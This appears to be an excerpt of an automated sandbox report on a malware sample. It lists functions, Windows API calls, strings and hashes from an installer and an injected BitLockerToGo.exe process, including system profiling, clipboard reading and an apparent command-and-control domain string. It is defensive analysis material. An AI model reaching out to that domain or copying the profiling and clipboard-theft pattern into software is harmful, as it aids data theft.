Opcode Fuzzy Hash: 8e5844faef86ca3b987609987c3631930d6245293f133a4970b5b02dc575c592
Instruction Fuzzy Hash: 4421B17620D7818ED315CB3C984461EBED24BDA128F088B6EE0E9977D6DA34C202871B

Function 0BCC6C3A Relevance: 5.1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

Strings

@, xrefs: 0BCC6C55
@, xrefs: 0BCC6C71
@, xrefs: 0BCC6CA1
@, xrefs: 0BCC6C41

Memory Dump Source

Source File: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: @$@$@$@
API String ID: 0-3310854385
Opcode ID: d191a229979ee8789016ecff2216aab21498a0262c67042f73cc9213fd577311
Instruction ID: 2e4cbaa261ce8fd536b6eaa561d5fed2d2d6b71426e053aeb1eb01dfce1f2134
Opcode Fuzzy Hash: d191a229979ee8789016ecff2216aab21498a0262c67042f73cc9213fd577311
Instruction Fuzzy Hash: 3A11038588E3C50FD70357B058383C13FA09C2B028B2910CFD9E6EE193D0AD0A8B872B

Function 0BCA4166 Relevance: 5.1, Strings: 4, Instructions: 53COMMON

Download Yara Rule

Strings

s, xrefs: 0BCA4195
!, xrefs: 0BCA4187
s, xrefs: 0BCA418E
p, xrefs: 0BCA419C

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: !$p$s$s
API String ID: 0-3494536697
Opcode ID: 7ca66223bcfbe6d6295298f97e62eb5b9ffa0fb8240818be573cf253a8b41eb6
Instruction ID: e5ac02b7419a38ab13d025aba053345490898a82799e0520c1ccad4731d939d0
Opcode Fuzzy Hash: 7ca66223bcfbe6d6295298f97e62eb5b9ffa0fb8240818be573cf253a8b41eb6
Instruction Fuzzy Hash: 65119631E4A5948BFB1DCA28C874BE97BB27F96304F0481ECC94A5B3D2D5764D45CB40

Analysis Process: BitLockerToGo.exePID: 6204, Parent PID: 6056COMMON

Execution Graph

Execution Coverage:	8.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	18.7%
Total number of Nodes:	198
Total number of Limit Nodes:	18

Executed Functions

Function 0043C8E0 Relevance: 25.4, APIs: 11, Strings: 3, Instructions: 894
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(8C8F8EA4,00000000,00000001,?,00000000), ref: 0043CD11
SysAllocString.OLEAUT32(10C012CB), ref: 0043CDEC
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043CE2A
SysAllocString.OLEAUT32(99E99FE1), ref: 0043CE85
SysAllocString.OLEAUT32(AEECA81C), ref: 0043CF1B
VariantInit.OLEAUT32(?), ref: 0043CF8E
SysFreeString.OLEAUT32(00000000), ref: 0043D298
GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043D2D4

Strings

kh, xrefs: 0043CFC8
]yt, xrefs: 0043CBA0
sW!, xrefs: 0043CB90

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: ]yt$kh$sW!
API String ID: 505850577-622500489
Opcode ID: 218313b1412bf4a74100eb1e8f7f58e6826bcd56ddce35692e70b806f68d1e15
Instruction ID: 38cb2ca6820a58c7cac32007bf28007cb9ac277ba17ca13c06221467e443e475
Opcode Fuzzy Hash: 218313b1412bf4a74100eb1e8f7f58e6826bcd56ddce35692e70b806f68d1e15
Instruction Fuzzy Hash: 85520F71A083418BD324CF68D88576BBBE1EFC9314F188A2DE5D987391D779D805CB86

Function 0041126B Relevance: 20.0, APIs: 2, Strings: 9, Instructions: 740
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

s, xrefs: 00411410
%, xrefs: 00411833
f, xrefs: 00411574
8, xrefs: 00411308
J, xrefs: 00411A18
", xrefs: 00411A20
T, xrefs: 00411AD2
v, xrefs: 004119B0
b, xrefs: 004119B8

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "$%$8$J$T$b$f$s$v
API String ID: 0-1583681712
Opcode ID: b1e9669dd0beb6d825b61117686608163d2f92297795144fb7ebfa6fbb44db80
Instruction ID: 7c228894cde2f5feb590d0c8aa64b1eb5a9522a4d122b3896508aba4e67fb851
Opcode Fuzzy Hash: b1e9669dd0beb6d825b61117686608163d2f92297795144fb7ebfa6fbb44db80
Instruction Fuzzy Hash: 9A52C07160C7808BD3249B38C4953EFBBE1ABD5314F194E2EE5DA873D2D63989818B47

Function 0040E8E0 Relevance: 13.8, APIs: 1, Strings: 8, Instructions: 294
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040E8EC

Strings

x, xrefs: 0040EA0D
&', xrefs: 0040ECAC
=>*R, xrefs: 0040EA67
yD, xrefs: 0040E9BA
)0%$, xrefs: 0040E9D6
74&<, xrefs: 0040E9CB
impossiblekdo.click, xrefs: 0040ED08
+, xrefs: 0040E901

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Uninitialize
String ID: &'$)0%$$+$74&<$=>*R$impossiblekdo.click$x$yD
API String ID: 3861434553-1677365012
Opcode ID: ae66dcb8edd8295c583b9f8e6c2b1b178c81cf66bcfea210aa0e54298d533f17
Instruction ID: 34c3e251de18943084ff93d53479d9e83069cc7c7c21c5a76ddf7ff9f8c5ca0e
Opcode Fuzzy Hash: ae66dcb8edd8295c583b9f8e6c2b1b178c81cf66bcfea210aa0e54298d533f17
Instruction Fuzzy Hash: 08A19CB024C3D18AE335CF25D4A57ABBFE0EF92304F085D6DD4DA5B282D2794509CB5A

Function 00426735 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PQ, xrefs: 00426673
M1S3, xrefs: 00426633

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: M1S3$PQ
API String ID: 0-1932013457
Opcode ID: d1a8ac3e9c016c09714bd1ab962254f92a2d731187c932a52c4b79da3ee2a966
Instruction ID: e48b2e6bd6cdd83746b1dfd5e170617c271385c301790d30148b843b73927364
Opcode Fuzzy Hash: d1a8ac3e9c016c09714bd1ab962254f92a2d731187c932a52c4b79da3ee2a966
Instruction Fuzzy Hash: 98D1CFB56083048BD310DF28D89176FB7E2FFD6318F49892DE5D58B391EBB884098B56

Function 004089D0 Relevance: 7.8, APIs: 5, Instructions: 270
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004089F4
GetCurrentThreadId.KERNEL32 ref: 004089FE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408B38
GetForegroundWindow.USER32 ref: 00408B5F
ExitProcess.KERNEL32 ref: 00408CF9

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 66ef9d237b6ee2111f21b91d85ece5613bf401e0834894ea263df7ef4a956454
Instruction ID: 212e5fd3ce4f332dd7c992be6739036e717e4285c51696381f5b313dc4b922a1
Opcode Fuzzy Hash: 66ef9d237b6ee2111f21b91d85ece5613bf401e0834894ea263df7ef4a956454
Instruction Fuzzy Hash: F6817773F547140BD7189EADDD5636AF6D6ABC8300F0E813EA885EB391E97CDC084299

Function 0043115A Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

]J@7, xrefs: 004311F6
W]XR, xrefs: 004314A4

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: W]XR$]J@7
API String ID: 0-1468689549
Opcode ID: f634599f0a4ca155d984cd159e6a663e15cc05fb8ccfc8b608072e87663dcbba
Instruction ID: bca3ffaa59a83c6197305cd3925468ee7adb37de9b0b039490def076fe5d86f1
Opcode Fuzzy Hash: f634599f0a4ca155d984cd159e6a663e15cc05fb8ccfc8b608072e87663dcbba
Instruction Fuzzy Hash: A2C19F702047828FE719CF29C5A0762FBE0AF1A304F1895AEC49A8F792D379D846CB54

Function 004303AC Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 0043130B

Strings

]J@7, xrefs: 004311F6
W]XR, xrefs: 004314A4

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: W]XR$]J@7
API String ID: 3960555810-1468689549
Opcode ID: 4c4229ad1d99ff28d1f0b791c74aab91a179863069ac118f9e5849ca580ca70a
Instruction ID: 249ee34c7a8a3241266849a0fa0e04e4a8520e92d76531db254aa3f176f7a024
Opcode Fuzzy Hash: 4c4229ad1d99ff28d1f0b791c74aab91a179863069ac118f9e5849ca580ca70a
Instruction Fuzzy Hash: 48B19FB42047818FD719CF29C5A0723FBE0AF5A304F1895AEC49A8F752D779D806CB58

Function 00441610 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00444D2D,?,00000018,?,?,00000018,?,?,?), ref: 0044163E

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 004423C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 004423C1
GetForegroundWindow.USER32 ref: 004423D0

Strings

6, xrefs: 004423DF

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: ForegroundWindow
String ID: 6
API String ID: 2020703349-3094414616
Opcode ID: 5ee4909ad9595ed2444eda0b88a28784bce2d3c544027bc7afdcf4119f1208b1
Instruction ID: 7dc5827220d18da5ab314bbabb81dbb95c60791c211162616d5f199701cdf4f6
Opcode Fuzzy Hash: 5ee4909ad9595ed2444eda0b88a28784bce2d3c544027bc7afdcf4119f1208b1
Instruction Fuzzy Hash: D6D0A7F9D108448BE7089B61BC5651B361AE64120B308403DF50381213D934A114864E

Function 00430CCC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNEL32(00000005,?,?), ref: 00430D53

Strings

),4/, xrefs: 00430CDE

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: ComputerName
String ID: ),4/
API String ID: 3545744682-3721547394
Opcode ID: a934137f2064ac4660701f54429352bf572ad9701a4ce6db1ceb93b5db2b99f5
Instruction ID: b8ae0c1209c051ed472a34ba02e93afa46155e27f983dfa8dbbc93ac9c304a0f
Opcode Fuzzy Hash: a934137f2064ac4660701f54429352bf572ad9701a4ce6db1ceb93b5db2b99f5
Instruction Fuzzy Hash: 9A119E701006428BE315CF25D4A0767FBE0FF1A300F189A89D0968B392DB78E885CB94

Function 0043FB90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,000000E9,00415548,?), ref: 0043FBB0

Strings

HUA, xrefs: 0043FB91

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID: HUA
API String ID: 3298025750-1205853565
Opcode ID: d58fed2e863046af25912a94341c008376f818ec140325d517bf7c269213700c
Instruction ID: cdaecf840d86360fb4332a33f3218a2b4ff9557b3e06c2cbe1370b7b760a32e0
Opcode Fuzzy Hash: d58fed2e863046af25912a94341c008376f818ec140325d517bf7c269213700c
Instruction Fuzzy Hash: A9D0C931405122EBDA102F19BC06BC73B54AF49625F4708A2F4406A166D628DD91CAD8

Function 00437C00 Relevance: 3.1, APIs: 2, Instructions: 101COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00437C42
GetSystemMetrics.USER32 ref: 00437C52

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 2accbae3a30166681635bf60100c6b0ef4f9de8f49243af9879af9aefacfef71
Instruction ID: 0eb28034a5cd9c9c77c24750035d80e9639979777662d0fb7a387b3aabb46943
Opcode Fuzzy Hash: 2accbae3a30166681635bf60100c6b0ef4f9de8f49243af9879af9aefacfef71
Instruction Fuzzy Hash: 41612CB044E3C1CAE7B0DF95C598B9BBAF0BB84349F14892ED18C4B650CBB95448DB5B

Function 0043185D Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNEL32(00000006,?,?), ref: 004319C9

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 9ce901d82881c584d1ccb1c33a33ecd2016ef896576360c638ca8bbed4e0c02d
Instruction ID: 209ae2a755994f0d7f3cbfff1b46e822909fd3e3287bbeddd6de14e3d11eb157
Opcode Fuzzy Hash: 9ce901d82881c584d1ccb1c33a33ecd2016ef896576360c638ca8bbed4e0c02d
Instruction Fuzzy Hash: 9731F2B4A057028FE3088F29D891727FBE1BF4A305F1895ADD09ACB751C77CE84A8B54

Function 00441590 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,00004000,?,00004000,?,?,?,?,?,02F2BA48,000001EC,?,?,0041524C), ref: 004415DC

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 82ca4d182dd4c9ee99eeb60f763331002ca02a00f2b18ec8258a3ead31cc0c1b
Instruction ID: b154211915f713fe7a7a10d6b432ab50b59de905ba3b5bd7a024d7f97f7afe6e
Opcode Fuzzy Hash: 82ca4d182dd4c9ee99eeb60f763331002ca02a00f2b18ec8258a3ead31cc0c1b
Instruction Fuzzy Hash: CDF0B475918210EBD2112F26BC26F1B7A74EF8BB97F060575F404A61B2D73DE801C6AD

Function 00436ABB Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00436B06

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: ce13bac261f55febe2c17b6df4fc7031213563906b13b579b539bb21083dc25f
Instruction ID: b44691facc9a9199cba9b19072089612eb6a151e0781b33a4a5e40467400eb5f
Opcode Fuzzy Hash: ce13bac261f55febe2c17b6df4fc7031213563906b13b579b539bb21083dc25f
Instruction Fuzzy Hash: 85F0E7752097028FE300DF24D49831BBBE1BB84314F25891CD0A54B350CBB5E9498FC2

Function 00433AC6 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00433B0E

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 789aff99e991c2dca59ce852d03e82287623c2e474d2acf0555d5d0e6c42b644
Instruction ID: a1815aa170b6d38f4d84d3581d46581d9730ce4598bc258ef484d3290ce6a294
Opcode Fuzzy Hash: 789aff99e991c2dca59ce852d03e82287623c2e474d2acf0555d5d0e6c42b644
Instruction Fuzzy Hash: F1F07FB46087029FE350DF29C0A871BBBF0FB85314F00890CE5958B290CBB5A9488F82

Function 0040D360 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D373

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: bb29ff4400fdac66347159a0b82cd3e44abb81591f08572800acf87ef785c471
Instruction ID: 92d6cc9ac8c101bbea1ace3c29ee64889eb4d16d17dbec7b4acb9532ee1763f6
Opcode Fuzzy Hash: bb29ff4400fdac66347159a0b82cd3e44abb81591f08572800acf87ef785c471
Instruction Fuzzy Hash: 1CD0A73459814477D3146B1DEC8BF1B369CC303764F400238B7A2CA2D1DD506D14D669

Function 0040D393 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D3A5

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: f82dee0629d6eedd29374c968fa56da70c84035cb9076f9626aaa167bacd0141
Instruction ID: d14720f2b62865857bce6eafd75e42a7c8b3ee0405f82c5ddf0a4fe5436f609d
Opcode Fuzzy Hash: f82dee0629d6eedd29374c968fa56da70c84035cb9076f9626aaa167bacd0141
Instruction Fuzzy Hash: A9D0C9383D43007AF2748B08AC53F1632909306F15F30062CB326FE2D0C9E075009A0C

Function 0043FB70 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00408C4F,DDDC83E2), ref: 0043FB80

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 103e42bfc54345fb2d0b1dccc10331165a6a416c8a3e0c9a31b8949d9a48309c
Instruction ID: 2a834e56f76d788504e24f95fc114a373e8a13855703d08c64242a58fdbc03a4
Opcode Fuzzy Hash: 103e42bfc54345fb2d0b1dccc10331165a6a416c8a3e0c9a31b8949d9a48309c
Instruction Fuzzy Hash: 2DC09B31055120ABD5502F15FC05FC67F54DF55762F020455B40477077C764FD81C6D8

Non-executed Functions

Function 004269E0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 294COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00426AC6
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00426B58

Strings

K,A", xrefs: 00426A39
bmB, xrefs: 00426D5B
bmB, xrefs: 00426B37
SP, xrefs: 00426A65
W0T6, xrefs: 00426A21

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: K,A"$SP$W0T6$bmB$bmB
API String ID: 237503144-1072144938
Opcode ID: 089109b84795c9bedf8310121246df4f2ffc13ae9026a33533cd087c8b9f8278
Instruction ID: be6081cd276c973b9e7e4dd459288b6f2f12a4a1b89cde47d34233ee9b9367d9
Opcode Fuzzy Hash: 089109b84795c9bedf8310121246df4f2ffc13ae9026a33533cd087c8b9f8278
Instruction Fuzzy Hash: 60A11EB26083109FD314CF29D89075FBBE5FBC5304F12892DF6968B291D7B59849CB86

Function 00437A50 Relevance: 9.1, APIs: 6, Instructions: 134clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00437A72
GetClipboardData.USER32 ref: 00437A93
GlobalLock.KERNEL32 ref: 00437AB0
GlobalUnlock.KERNEL32 ref: 00437BE0
CloseClipboard.USER32 ref: 00437BE8

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 27b9d519ae2becfacd625e5db8214f135442690650804e0061aa99791fca8e1f
Instruction ID: a55d531138426037b9d6071f4cb6ef5b208dbd86bb1d813e2860245ff2550ac5
Opcode Fuzzy Hash: 27b9d519ae2becfacd625e5db8214f135442690650804e0061aa99791fca8e1f
Instruction Fuzzy Hash: 3E51E2B1808A818FD710AB78D48939EFFB0AB05308F05862ED4D59B782D379A559C7A7

Function 00430A2D Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 221COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(6F6D6255), ref: 00430BD1

Strings

Ubmo, xrefs: 00430A9A
v#, xrefs: 00430AA8
ajjg, xrefs: 00430A8C
aaoh, xrefs: 00430AA1

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: FreeLibrary
String ID: Ubmo$aaoh$ajjg$v#
API String ID: 3664257935-1084779451
Opcode ID: 67138b01c29dc32a8a4c0ba747f5d40b4fbbdbf4601495e35470727944d53a5b
Instruction ID: 64f83fa39b082bb052500750a89acad02ccf2781b9323b6aa59904a1605d94ee
Opcode Fuzzy Hash: 67138b01c29dc32a8a4c0ba747f5d40b4fbbdbf4601495e35470727944d53a5b
Instruction Fuzzy Hash: 5171F6716047418FE325CF29C891B23BBE1FF56308F28D46DD4AA9B792C779E8028B14

Function 00433574 Relevance: 50.9, APIs: 1, Strings: 28, Instructions: 149COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0043358F

Strings

4, xrefs: 004335F6
, xrefs: 00433662
<, xrefs: 00433616
', xrefs: 0043367A
,, xrefs: 00433692
8, xrefs: 00433606
/, xrefs: 00433682
(, xrefs: 004335C6
*, xrefs: 004335BE
&, xrefs: 0043363A
, xrefs: 0043364A
2, xrefs: 004335DE
1, xrefs: 00433622
>, xrefs: 0043360E
,, xrefs: 004335D6
$, xrefs: 00433672
1, xrefs: 0043369A
0, xrefs: 004335E6
6, xrefs: 004335EE
:, xrefs: 004335FE
/, xrefs: 0043368A
+, xrefs: 00433652
., xrefs: 004335CE
$, xrefs: 004335B6
&, xrefs: 004335AE
, xrefs: 004335A6
(, xrefs: 0043365A
0, xrefs: 00433767

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: FreeString
String ID: $ $ $$$$$&$&$'$($($*$+$,$,$.$/$/$0$0$1$1$2$4$6$8$:$<$>
API String ID: 3341692771-539718436
Opcode ID: ce77e2acbc068e3f73e8720a49786ab0727579232b72c2031942efc2cccb0b23
Instruction ID: e968232c2f334e43c2b2c4dcd51a2d2552617a050439fe8167e3665d00ac3ca8
Opcode Fuzzy Hash: ce77e2acbc068e3f73e8720a49786ab0727579232b72c2031942efc2cccb0b23
Instruction Fuzzy Hash: 0A713460108BC28EDB26CF3C88D86467E902B67224F5897DCD8E54F3DBD3A5C106C366

Function 00433CF4 Relevance: 50.9, APIs: 1, Strings: 28, Instructions: 147COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 00433D00

Strings

8, xrefs: 00433D77
&, xrefs: 00433DAB
2, xrefs: 00433D4F
0, xrefs: 00433EE0
$, xrefs: 00433DE3
(, xrefs: 00433DCB
&, xrefs: 00433D1F
$, xrefs: 00433D27
(, xrefs: 00433D37
,, xrefs: 00433E03
<, xrefs: 00433D87
*, xrefs: 00433D2F
:, xrefs: 00433D6F
, xrefs: 00433DBB
', xrefs: 00433DEB
+, xrefs: 00433DC3
0, xrefs: 00433D57
,, xrefs: 00433D47
1, xrefs: 00433D93
>, xrefs: 00433D7F
., xrefs: 00433D3F
1, xrefs: 00433E0B
/, xrefs: 00433DF3
4, xrefs: 00433D67
6, xrefs: 00433D5F
, xrefs: 00433DD3
/, xrefs: 00433DFB
